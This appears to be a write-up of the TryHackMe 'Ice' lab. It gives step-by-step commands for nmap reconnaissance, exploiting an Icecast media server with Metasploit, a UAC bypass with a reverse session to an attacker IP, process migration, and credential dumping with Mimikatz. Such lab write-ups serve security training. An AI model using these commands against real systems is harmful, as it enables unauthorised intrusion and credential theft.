Xuptox

Ice

Deploy & hack into a Windows machine, exploiting a very poorly secured media server.

Windows CVE

Room Description

Deploy & hack into a Windows machine, exploiting a very poorly secured media server. Find THM room here

Used Commands & Scripts

Scripts

post/multi/recon/local_exploit_suggester exploit/windows/local/bypassuac_eventvwr post/windows/manage/enable_rdp

Commands 

sudo nmap -A -sS -oN logfile.txt -vv <target ip>
run post/multi/recon/local_exploit_suggester

Recon

Start enumaration with nmap sudo nmap -A -sS -oN logfile.txt -vv <target ip>


Starting Nmap 7.91 ( https://nmap.org ) at 2021-05-15 05:27 EDT
[...]

Not shown: 988 closed ports
Reason: 988 resets
PORT      STATE SERVICE      REASON          VERSION
135/tcp   open  msrpc        syn-ack ttl 127 Microsoft Windows RPC
139/tcp   open  netbios-ssn  syn-ack ttl 127 Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds syn-ack ttl 127 Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP)
3389/tcp  open  tcpwrapped   syn-ack ttl 127
[...]

8000/tcp  open  http         syn-ack ttl 127 Icecast streaming media server
49152/tcp open  unknown      syn-ack ttl 127
49153/tcp open  unknown      syn-ack ttl 127
49154/tcp open  unknown      syn-ack ttl 127
49158/tcp open  unknown      syn-ack ttl 127
49159/tcp open  unknown      syn-ack ttl 127
49160/tcp open  unknown      syn-ack ttl 127
[...]

Service Info: Host: DARK-PC; OS: Windows; CPE: cpe:/o:microsoft:windows
[...]

Read the log and you should find the following information:

  • the port Microsoft Remote Desktop is running on
  • the name of the service running on port 8000
  • the hostname of the machine

Gain Access

Search an existing exploit on one of the exploit databases. I used exploit-db and searched for icecast.

Find multiple records but only two of them referring to remote code execution. If you look closely both referring the same CVE. Use cvedetails and use the first result for further investigation.

If you find a page showing a CVSS Score of 7.5 you are on the right page. Search for Vulnerability Type(s).

Metasploit

Open a new terminal and start msfconsole. Search for icecast using search icecast. What’s the full path of the exploit? Follow the instructions of the room.

Use the exploit: use 0
Check the options: options
And set the missing parameters: set RHOSTS <target ip>

Finally, check the options again and make sure the parameters are set correctly. Then run the exploit with exploit.

If everything went well you should end up with an opened meterpreter shell.

Escalate

Now, what should we do next? No idea? run post/multi/recon/local_exploit_suggester in the current session. The result is a list of exploits the target seems to be vulnerable to.

To use one of the suggested exploits you first need to send the current meterpreter shell to the background by writing background or pressing CTRL-Z. I used CTRL-Z.

Write down the path for the first exploit and use that exploit with:
use exploit/windows/local/bypassuac_eventvwr

Check the options again and set the parameters:
options
set SESSION 1 (usually this should be 1 but can vary)
set LHOST <attacker ip>
exploit

Continue with the room.

Looting

I find the Looting section on that room to be explained pretty simply. This is the reason why I’ll keep it compact.

Show all processes with ps and find the described process name. The process you are searching for contains one of the words printer spool service.

meterpreter > ps

Process List
============

 PID   PPID  Name                  Arch  Session  User                          Path
 ---   ----  ----                  ----  -------  ----                          ----
 0     0     [System Process]
 4     0     System                x64   0
 416   4     smss.exe              x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\smss.exe
 604   584   csrss.exe             x64   1        NT AUTHORITY\SYSTEM           C:\Windows\System32\csrss.exe
 652   584   winlogon.exe          x64   1        NT AUTHORITY\SYSTEM           C:\Windows\System32\svchost.exe
 [...]
 1316  1016  dwm.exe               x64   1        Dark-PC\Dark                  C:\Windows\System32\dwm.exe
 1328  1304  explorer.exe          x64   1        Dark-PC\Dark                  C:\Windows\explorer.exe
 1368  692   spoolsv.exe           x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\spoolsv.exe
 [...]

Migrate to this process using migrate <process id>. You can find the process id in the column PID.

The migration process was successful when you gained higher permissions. Check this with getuid in the newly created meterpreter session.

Continue with Mimikatz.

Load Mimikatz with load kiwi and open the help menu with help. Kiwi Commands is added to the help menu as part of the loading process.

Run the commands, play around and answer the questions.

Post-Exploitation

Use the help menu to answer the questions.

Create Repo For Hugo On GitHub →